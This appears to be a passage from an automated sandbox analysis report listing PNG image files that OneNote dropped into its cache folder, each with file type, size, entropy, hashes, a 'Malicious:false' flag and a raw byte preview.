                                                                                                                                            Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004C.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11332
                                                                                                                                            Entropy (8bit):7.9324721568775285
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                            MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                            SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                            SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                            SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004D.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2270
                                                                                                                                            Entropy (8bit):7.845368393313232
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                            MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                            SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                            SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                            SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004E.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14553
                                                                                                                                            Entropy (8bit):7.951135681293377
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                            MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                            SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                            SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                            SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004F.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11886
                                                                                                                                            Entropy (8bit):7.946442244439929
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                            MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                            SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                            SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                            SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004G.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22634
                                                                                                                                            Entropy (8bit):7.974332204835705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                            MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                            SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                            SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                            SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004H.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13737
                                                                                                                                            Entropy (8bit):7.916899917415529
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                            MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                            SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                            SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                            SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004I.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13241
                                                                                                                                            Entropy (8bit):7.931391290415517
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                            MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                            SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                            SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                            SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004J.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4490
                                                                                                                                            Entropy (8bit):7.928016176674318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                            MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                            SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                            SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                            SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004K.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17289
                                                                                                                                            Entropy (8bit):7.962998633267186
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                            MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                            SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                            SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                            SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004L.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2332
                                                                                                                                            Entropy (8bit):7.8822150338370776
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                            MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                            SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                            SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                            SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004M.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16003
                                                                                                                                            Entropy (8bit):7.959532793770661
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                            MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                            SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                            SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                            SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004N.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1924
                                                                                                                                            Entropy (8bit):7.836744258175623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                            MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                            SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                            SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                            SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004O.bin

